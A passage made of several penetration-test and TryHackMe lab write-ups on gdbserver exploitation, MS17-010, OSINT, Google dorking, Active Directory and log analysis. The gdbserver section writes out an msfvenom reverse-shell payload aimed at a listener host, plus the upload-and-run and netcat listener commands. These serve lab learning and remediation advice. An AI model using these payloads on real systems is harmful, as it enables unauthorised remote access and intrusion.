9. The file appears to be a to-do list for the user or admin of this machine. It looks like they have left out some important steps in their tasks. They created a GDB server on port 3333 but neglected to restrict access to it. In the proof of concept, we will focus on looking for an exploit that can take advantage of this insecure GDB server. This will demonstrate to the IT director the need for the budget required to replace the vulnerable Linux system

· Vulnerability Analysis

Understanding all potential exploitation vectors allows for a more comprehensive risk assessment of your system. By identifying multiple attack paths, you gain a clearer picture of the overall security posture and potential impact of an attack.

Vulnerability Description Tables

The vulnerabilities associated with port 3333 would depend on the specific service or application running on that port as it is a generic port number that can be assigned to various services or applications. In this instance it was used as a gdbserver.

GDBServer

· Proof of Concept

1. A thorough search of the internet and of the course files provided by the professor has led us to discover an exploit that allows the GNU Debugger to connect from another system. Since only the executable to be debugged needs to be resident on the target system this allows us remote access.

Credits to @B1n4rySh4d0w

2. We will need to create an ELF backdoor using msfvenom. Execute the following command:

<msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 PrependFork=true -f elf -o binary.elf>

3. Next, we need to modify the permissions of our backdoor file, “binary.elf”:

<chmod +x binary.elf>

4. Now, let’s open the backdoor using the GDB service.

<gdb binary.elf>

5. Within GDB, we will set the remote debugger to our target IP and port:

<target extended-remote 10.0.2.6:3333>

6. Following that, we will upload the backdoor ELF file using the “put” command:

<remote put binary.elf /home/binary.elf>

7. Let’s set the proper directory for the remote executable file:

<set remote exec-file /home/binary.elf>

The illustration below shows the parameters being set:

8. Before we can execute the “run” command, we need to open a new root terminal and run the command:

<nc -nlvp 4444>

This command sets up a listener using the “nc” (netcat) utility on our listening port, 4444.

9. Finally, execute the reverse shell executable:

<run>

You will notice the output appearing on the other root terminal where the listener is running. We can now interact with our reverse shell.

Congratulations! You have successfully obtained your reverse shell.

10. Once inside, we can determine the current directory:

<pwd>

11. Before proceeding to find the flag, I suggest exploring the system further. You can run commands such as:

>ls

>cd

>dir

12. Now, let’s hunt down the flag. Change the working directory and gain a broader perspective of the target’s contents:

>cd

>ls

There, you will find the flag.

13. Let’s read its contents:

<cat flag.txt>

The data value in the flag.txt file is b8d4beb98ea6ed32909fcb5afa8dd2f2

14. If desired, you can retrieve the actual file using the following command:

<remote get flag.txt /home/kali/Downloads/>

That concludes the tutorial. Happy pentesting!

Recommendations

1. Patch and Update: Ensure that the target system is running the latest updates and patches for the operating system and any relevant software, including the services associated with ports 21 and 3333.

2. Disable Unused Services: Disable any unnecessary or unused services running on ports 21 and 3333. If these services are not required for essential functionality, it is best to disable them altogether.

3. Access Controls and Authentication: Implement strong access controls and enforce proper authentication mechanisms for both ports 21 and 3333.

4. Firewall and Network Segmentation: Configure a firewall to restrict inbound and outbound traffic to ports 21 and 3333. Only allow necessary connections from trusted sources.

5. Intrusion Detection and Prevention Systems (IDS/IPS): Deploy an IDS/IPS solution to monitor network traffic and detect any malicious activities targeting ports 21 and 3333. Configure the system to generate alerts and take appropriate action upon detecting suspicious or unauthorized behavior.

• END-

Executive Summary

Goals and Timeline

• Purpose:

This penetration test was conducted to assess the security vulnerabilities present in a Windows 7 Enterprise system installed on the company’s network. The goal of the test was to demonstrate the risks and potential consequences of using an outdated operating system and to highlight the importance of upgrading to a more secure and supported version. The project started on May 25, 2023, and concluded on May 31, 2023.

• Start and Stop Dates:

The project started on May 25, 2023, and concluded on May 31, 2023.

Outline of the scope

• IP Address or Hostname in Scope

The scope of the project includes the penetration testing of two systems: the Kali Linux machine (10.0.2.15) and the target Windows 7 Enterprise machine (10.0.2.4). The purpose of the penetration test is to identify vulnerabilities, exploit them, and demonstrate the potential impact of these vulnerabilities on the target system’s security.

• Penetration Test Type

The penetration test conducted in this project is a network penetration test. It focuses on assessing the security of the network infrastructure by identifying vulnerabilities in the systems and services running on the network. The primary objective is to evaluate the target Windows 7 Enterprise machine’s security posture and highlight the risks associated with using an unsupported operating system.

By conducting this penetration test, the team aimed to provide concrete evidence of the vulnerabilities and risks associated with running Windows 7 Enterprise. This would enable the organization to make informed decisions about the urgency and importance of upgrading to a more secure and supported operating system. The penetration test findings will serve as a basis for recommending appropriate remediation measures to enhance the overall security posture of the organization.

Findings

Fingerprinting.

By doing a network scan we discover several hosts up on the network.

To disable port scanning in Nmap, we can use the -sn flag. This flag tells Nmap to skip the port scanning phase and focus solely on host discovery. By using this flag, Nmap will only determine which hosts are up without performing any port scanning.

• 10.0.2.3

• 10.0.2.4

• 10.0.2.3

With only three addresses, we won’t have to go through too many to find our target. After this we can run an OS scan on each host using the <nmap -O> command.

This will tell us which host is running Windows 7.

The host with address 10.0.2.4 is our target.

Once we’ve found our target, we’ll want to conduct an open port scan of all 65535 ports

against the target system to understand what services exist that we’ll be able to interact with.

Now that we know which ports are open, you’ll want to use a more intrusive scan.

Run <sudo nmap -A 10.0.2.4>

Here are the results:

To make this information easier to digest I have created tables.

The target operating system is a Microsoft Windows 7 Ultimate 7601 Service Pack 1.

In an attempt to access RPC without a username and password, I used the RPC client on Kali. However, interacting with RPC services without a password is generally not possible unless there are specific misconfigurations or vulnerabilities present in the target system. RPC services typically require authentication to ensure secure access and prevent unauthorized use.

Vulnerability Analysis

In-depth research about CVEs related to vulnerabilities on different ports is essential for organizations and security professionals. By staying informed about the specific vulnerabilities associated with ports commonly used by various services, we can proactively identify and mitigate potential risks. Understanding the nature and impact of these vulnerabilities allows organizations to prioritize security measures, allocate resources effectively, and implement appropriate countermeasures.

To this effect, I have created tables that display CVEs according to the NVD for the open ports in the target machine. The scores have been based on CVSS 3.x since CVSS 2.0 is out of date

The Nmap Scripting Engine (NSE) provides a wide range of script categories and options beyond just “smb” and “http”.

Using NSE I performed a lookup on all open ports from

• nmap -p 135 — script smb-vuln* 10.0.2.4

• nmap -p 139 — script smb-vuln* 10.0.2.4

• nmap -p 445 — script smb-vuln* 10.0.2.4

• nmap -p 49152 — script smb-vuln* 10.0.2.4

• nmap -p 49153 — script smb-vuln* 10.0.2.4

• nmap -p 49154 — script ssh-vuln* 10.0.2.4

• nmap -p 49155 — script smb-vuln* 10.0.2.4

• nmap -p 49156 — script smb-vuln* 10.0.2.4

• nmap -p 49158 — script smb-vuln* 10.0.2.4

This resulted in a discovery of a critical vulnerability in port 445

Vulnerability Title

- Remote Code Execution in Microsoft SMBv1 servers (ms17–010)

Vulnerability Severity (CVSS scale)

- High (CVSS score of 8.1)

Vulnerability Description

The vulnerability (CVE-2017–0143) allows remote attackers to execute arbitrary code on Microsoft SMBv1 servers. It affects the Confidentiality, Integrity, and Availability of the system. Exploiting this vulnerability can lead to unauthorized access, data theft, system compromise, and potential disruption of services.

Proof of Concept

1. Open metasploitable and search for exploits related to ms17–010

2. Pick the first exploit and see options for possible actions. Set rhost to target machine address 10.0.2.4.

3. Run exploit

4. When the exploit is finished. Search for the flag using search -f flag.txt

5. Change your directory and then read the contents by typing type flag.txt

Recommendations:

1. Apply the necessary security patches: Install the security updates provided by Microsoft to address the vulnerability. This includes the relevant patches mentioned in the Microsoft Security Bulletin MS17–010.

2. Disable SMBv1: If possible, consider disabling SMBv1 on affected systems to prevent the exploitation of this vulnerability. SMBv1 is an outdated protocol and disabling it can reduce the attack surface.

3. Enable SMBv2 or SMBv3: Upgrade to the newer versions of the SMB protocol (SMBv2 or SMBv3) where possible, as they include security enhancements and address the vulnerabilities present in SMBv1.

1. Network Segmentation: Implement network segmentation to isolate critical systems from potentially vulnerable systems. This can help contain the impact of any potential attacks targeting the vulnerability.

2. Implement strong security practices: Follow best practices for securing network services, such as regularly updating and patching systems, implementing strong access controls, using firewalls to restrict access, and monitoring for any suspicious network activity.

Consider implementing additional security measures, such as intrusion detection and prevention systems (IDPS), network monitoring, and user awareness training, to enhance the overall security posture and prevent potential exploitation of vulnerabilities.

This is a guide for the OhSINT room. The room is straightforward as in it is just a downloadable jpg which we will have to investigate in order to answer the following questions:

1. What is this users avatar of?

2. What city is this person in?

3. Whats the SSID of the WAP he connected to?

4. What is his personal email address?

5. What site did you find his email address on?

6. Where has he gone on holiday?

7. What is this persons password?

OSINT, or Open Source Intelligence, is the practice of collecting and analyzing information that is publicly available. We need to determine what we want to accomplish through your OSINT research. In this exercise we will use search engines, social media, and other online sources to gather information.

First we will boot Kali up and bring the jpg over for investigation.

After you have installed ExifTool, run it and record the results.

You will notice a Copyright, we will investigate this further. A quick google search reveals the following links.

1. What is this users avatar of?

It is a cat, as featured on their twitter page.

2. What city is this person in?

This person is in London according to their GitHub profile.

3. Whats the SSID of the WAP he connected to?

We need to use a finder for this question. In this instance we will use WiGLE. Create an account first.

Then we will perform a query the BSSID which has been provided on Twitter.

The SSID is UnileverWiFi.

4. What is his personal email address? What site did you find his email address on?

Their email is featured on GitHub.

5. Where has he gone on holiday?

He went to New York.

6. What is this persons password?

Hidden in the WordPress page is a string in white “pennYDr0pper.!” This is likely the password.

That concludes this writeup.

Part 1

Today we are going to discuss the Google Dorking on TryHackMe. Being good at using search engines is a necessity for cybersecurity professionals because it allows them to quickly and efficiently find information related to security. Cybersecurity professionals need to conduct research on various topics such as vulnerabilities, threat actors, attack techniques, and security tools. Search engines are a valuable resource for finding this information.

When investigating a security incident, cybersecurity professionals often need to collect and analyze data from various sources, such as logs, network traffic, and system files. Search engines can help them find relevant information quickly, which can be crucial in a fast-paced investigation. Additionally, search engines can help cybersecurity professionals stay up-to-date on the latest security news and trends, enabling them to stay ahead of potential threats. Therefore, being skilled in using search engines is essential for cybersecurity professionals to effectively protect organizations from cyber threats.

Here is a simple diagram of how web crawlers work:

When a crawler “indexes,” it means that the crawler has visited a webpage and analyzed its content, storing information about the page in the search engine’s database. This information includes the page’s URL, title, meta description, text content, images, links, and other relevant data. By analyzing this information, the search engine’s algorithm can determine the relevance and importance of the page in relation to specific search queries.

Indexing is a crucial step in the search engine process, as it enables the search engine to create a comprehensive and organized database of web pages that can be quickly searched and accessed by users. When a user enters a search query, the search engine’s algorithm scans its index and returns a list of relevant pages based on factors such as keyword relevance, content quality, and backlinks. The more pages a search engine indexes, and the more frequently it updates its index, the more comprehensive and accurate its search results will be.

A search engine crawler, also known as a spider or bot, is an automated program used by search engines to discover, scan, and index web pages on the Internet. The crawler follows links from one page to another, collecting information about the content, structure, and links of each page it visits. This information is then analyzed by the search engine’s algorithm to determine the relevance and importance of the page in relation to specific search queries. Crawlers use various techniques to identify and prioritize pages to crawl, including following links from other pages, submitting URLs to be crawled, and monitoring changes to pages they have previously crawled. The use of crawlers allows search engines to create comprehensive indexes of the web, which can be quickly searched and accessed by users looking for specific information.

Once a web crawler discovers a domain such as mywebsite.com, it will attempt to index the contents of the domain, following links from one page to another to find and collect information about the content on each page. The crawler will look for various elements on the pages, including text content, images, links, metadata, and other structured data.

Part 2

When you search for something on Google, the search engine tries to show you the most relevant and useful results. SEO is the practice of optimizing a website or content to make it more likely to appear at the top of those search results.

For example, if you have a website selling shoes, you would want to optimize your website so that when someone searches for “buy shoes online,” your website would be one of the first results they see.

SEO involves various techniques, such as using relevant keywords, creating high-quality content, improving website speed and user experience, building links from other websites, and more. The goal of SEO is to increase the visibility and traffic to your website, ultimately resulting in more sales or conversions.

SEO is a popular topic in search engines and many businesses focus on improving their website’s SEO ranking. Search engines prefer domains that are easy to index and there are several factors that determine a domain’s score. Search engines use algorithms to rank domains, but they don’t share how this ranking system works. You can pay to advertise or boost your domain’s ranking in search results.

Here’s a sample of a SEO rating for tryhackme:

Part 3

In this part we will discuss how to prevent certain directories to be indexed. Search engines will want to retrieve everything from a website but there are cases where we wouldn’t want all of the contents of our website to be indexed.

Robots.txt is a file that website owners create to give instructions to web robots or crawlers, such as search engine bots, on how to crawl and index their website’s pages. The robots.txt file is placed in the root directory of the website and contains specific directives to tell the web robots which pages or parts of the website to crawl and index, and which pages or files to ignore.

This file can be used to prevent certain pages from being indexed, control the crawl rate, and indicate the location of the website’s sitemap. The robots.txt file is an essential tool for website owners to manage how their website is crawled and indexed by search engines and other web robots.

Here is a basic markup of the robot.txt file:

Here are some terms and definitions.

• User-agent — Specify the type of “Crawler” that can index your site (the asterisk being a wildcard, allowing all “User-agents”
• Allow — Specify the directories or file(s) that the “Crawler” can index
• Disallow — Specify the directories or file(s) that the “Crawler” cannot index
• Sitemap — Provide a reference to where the sitemap is located (improves SEO as previously discussed, we’ll come to sitemaps in the next task)

To prevent files from being indexed do this:

The “Crawler” cannot index any file that has the extension of .ini within any directory/sub-directory using (“$”) of the site.

Part 4

A sitemap is a file that lists all of the pages on a website that are available for crawling and indexing by search engines. The typical file structure of a sitemap is an XML file that includes URLs of the pages on a website.

The XML sitemap consists of a root element <urlset> and individual <url> elements for each URL. Each <url> element includes information such as the URL of the page, the date it was last modified, and how frequently the page is updated.

Just as a map helps people navigate through a new or unfamiliar place, a sitemap helps search engine crawlers navigate and understand the structure of a website. It provides a clear and easy-to-follow roadmap for search engines to follow, which can help ensure that all pages on a website are crawled and indexed properly.

However unlike a map with lines and shapes, sitemaps look like this:

When a search engine crawler accesses a sitemap, it reads the information contained within it and uses it to determine how to crawl and index the pages on the website. The crawler may follow links from the sitemap to other pages on the site, or it may crawl pages that are not included in the sitemap.

Part 5

Google dorking, also known as Google hacking, is a technique that involves using advanced search operators and search parameters in Google search to uncover sensitive information that is not readily available through regular search queries.

This potentially dangerous tool allows individuals to use specific search terms and operators to identify vulnerable websites, locate hidden information, or discover sensitive information that may have been exposed online. It is often used by security researchers and hackers to find vulnerabilities and weaknesses in websites and networks.

It can can be used to search for various types of information, such as login pages, SQL errors, exposed documents, and more. However, it is important to note that using Google dorking to gain unauthorized access to systems or networks is illegal and can result in criminal charges.

Directory traversal, also known as path traversal or directory climbing, is a technique used to access files and directories stored outside of the web root directory of a web application.

In a web application, the web root directory is the directory from which the application serves files to visitors. It is generally considered safe to serve files only from within the web root directory, as it helps to prevent unauthorized access to sensitive files and directories on the server.

Here is an example of such technique:

This concludes the write-up

This is my guide to the Active Directory Basics room on TryHackMe

Active Directory is a crucial component of the corporate world, simplifying the management of devices and users within a business environment. To overcome scalability challenges, network administrators rely on a Windows domain, which comprises a group of users and computers under the administration of a given business. The key objective of a domain is to centralize the management of common components of a Windows computer network within a single repository known as Active Directory (AD). The Domain Controller (DC) is the server that runs the Active Directory services.

Configuring a Windows domain provides several advantages, including centralized identity management, where all users across the network can be effortlessly configured from Active Directory. Additionally, you can configure security policies directly from Active Directory and apply them to users and computers across the network as required, making it easier to manage security policies.

Here is a diagram of the sample domain featured in the work room:

The first two questions are answerable by looking at the information in the room page.

We will now begin by establishing and RDP connection with the provided machine. Click on the start machine and enter the IP provided. Then sign in with the credentials given.

The answers to the next few questions you are asked are also written on the exercise page.

These are the types of security groups:

Domain Admins normally administrates all computers and resources in a domain.

Knowing the name of the machine account for “TOM-PC” is also laid out in the work information.

Therefore the machine account for “TOM-PC” would be “TOM-PC$”

Organizational Units (OUs) are container objects that help organize the objects within Active Directory. OUs are particularly useful for classifying users and machines into logical groups based on their policing requirements. For instance, the Sales department in your organization may require different policies than the IT department. It’s worth noting that a user can belong to only one OU at a time.

The next part is all about checking the existing AD OUs and users. To help us out here is an organizational chart.

We will need to delete the OU that got cut.

Uncheck the box in the OU’s properties that prevent it from being deletion and delete it.

Next, Delegate permission to Phillip, use the delegation wizard and check the second option.

After that, the next step is to reset Sophie’s password. RDP in as Phillip.

Input this command in PowerShell to change Sophie’s password.

Input this command in PowerShell to specify force a password reset at the next logon.

Log on as Sophie and promptly change the password.

We have just delegated. The process of granting privileges to a user over some OU or other AD Object is called delegation.

Create Workstation and Server OU’s

Move the servers to the Server OU and the pcs to the workstation OU. There should be 7 in workstation and 3 in Server

It is recommendable to create separate OUs for Servers and Workstations.

For the next step we are asked to investigate GP management. To this extent we will change the minimum password length. In order to do this, follow this path:
Computer Configurations -> Policies -> Windows Setting -> Security Settings -> Account Policies -> Password Policy. Then when the window shows up, do as demonstrated.

Once a change has been made to any GPOs, it might take up to 2 hours for computers to catch up.

Next we shall create a new GPO, lets call it Restrict Control Panel Access. We have to enable this rule:

Then proceed to include Management, marketing and sales in it.

Next we will set up Auto Lock Screen GPO. To do this go to the existing GPO settings and select security options.

Set it to 300 seconds

GPOs are distributed to the network via a network share called SYSVOL and GPO can be used to apply settings to users and computers.

The next part is mostly theory.

When Kerberos is used for authentication, the following process occurs:

Firstly, the user sends their username and a timestamp encrypted with a key derived from their password to the Key Distribution Center (KDC), which is usually installed on the Domain Controller. The KDC then sends back a Ticket Granting Ticket (TGT), which allows the user to request additional tickets to access specific services. Along with the TGT, a Session Key is given to the user, which they will need to generate the following requests. It is important to note that the TGT is encrypted with the krbtgt account’s password hash, which means the user cannot access its contents. However, the TGT contains a copy of the Session Key, and the KDC can recover a copy by decrypting the TGT if required.

Secondly, when the user wants to connect to a service like a website, share or database, they will use their TGT to request a Ticket Granting Service (TGS) from the KDC. To request a TGS, the user will send their username and a timestamp encrypted with the Session Key, along with the TGT and a Service Principal Name (SPN), which indicates the service and server name they intend to access. The KDC will then send a TGS along with a Service Session Key, which the user needs to authenticate to the desired service. The TGS is encrypted using a key derived from the Service Owner Hash, and it contains a copy of the Service Session Key on its encrypted contents.

Finally, the TGS is sent to the desired service to authenticate and establish a connection. The service will use its configured account’s password hash to decrypt the TGS and validate the Service Session Key.

Active Directory enables the integration of multiple domains, allowing you to divide your network into independent units that can be managed separately. When two domains have the same namespace, they can be joined together to form a Tree. This partitioned structure provides better control over access to domain resources. Each branch has its own domain controller responsible for managing its resources, ensuring that UK users cannot manage US users, for example. The policies can also be configured independently for each domain in the tree.

A forest is formed when several trees with different namespaces are united into a single network. This arrangement of multiple domains in trees and forests offers a well-organized network in terms of resource and management compartmentalization. However, situations may arise where a user in one domain needs to access resources in another domain. In such cases, domains that are arranged in trees and forests are joined together using trust relationships.

Thank you for reading my guide.

TryHackMe Public Profile:

https://tryhackme.com/p/dom.ibanez

Task 2: Reconnaissance

The first step is to answer the prompt and download the important files.

Extract the logs from the zip file. The next question asks us for the tools that the attacker used. This means we will be looking at the access.txt file. When we take a closer look, we are able to see the different tools that where ran.

Nmap: Nmap is a network exploration and security auditing tool that is used to discover hosts and services on a computer network, thus creating a map of the network. It can be used to identify hosts and services, perform port scanning, and detect vulnerabilities.

Hydra: Hydra is a password cracking tool used to perform brute-force attacks on various protocols such as SSH, FTP, Telnet, and more. It can be used to test the strength of passwords and identify weak passwords in a network.

Sqlmap: Sqlmap is an open-source penetration testing tool used for detecting and exploiting SQL injection vulnerabilities in web applications. It can be used to perform database fingerprinting, dumping data from databases, and executing arbitrary SQL commands.

Curl: Curl is a command-line tool for transferring data from or to a server. It supports various protocols such as HTTP, HTTPS, FTP, FTPS, SCP, SFTP, and more. It can be used to transfer files, download web pages, and interact with REST APIs.

Feroxbuster: Feroxbuster is a web directory and file bruteforcer that is used to discover hidden content on web servers. It can be used to discover hidden directories and files on a web server, identify sensitive files, and find hidden API endpoints.

The next question asks which endpoint was vulnerable to the hydra tool. One look at the logs tell us what we need to know:

Next it asks us which endpoint was vulnerable to SQL injection. We will look at the first instance use of the sqlmap tool:

The directory path is the answer and the parameter is specified as “q”.

The endpoint is FTP, it is found near the end of the document.

Task 3: Stolen Data

The first question asks us which section of the website the attacker used to scrape user email addresses. Still referencing the access logs we will assume to point of view of an attacker and perhaps emails can be found in product review sections for online stores.

Then we are asked if the brute-force attack was successful. When looking at the logs we can see that after the entries for Hydra, the attacker did indeed get admin access.

They retrieved the email and password from the attack. The endpoint of the previous task which had to do with SQL.

We also know that the two files they downloaded were shown at the bottom of the log.

For next question we will be looking at the vsftpd log. Vsftpd logs contain information about FTP transactions and activities that occur on the server. The question asks us for service and account name were used to retrieve files from the previous question. Here we see the files and the service used was ftp and account names is anonymous.

For the final question we are asked for the service and username were used to gain shell access to the server. The auth.log file is a system log file found in Unix and Linux-based operating systems. It contains information about user authentication and authorization activities on the system, such as login attempts, password changes, and other security-related events. We see the bruteforce attempts and ultimately it goes through. The credentials are ssh, www-data respectively.

That wraps up the guide.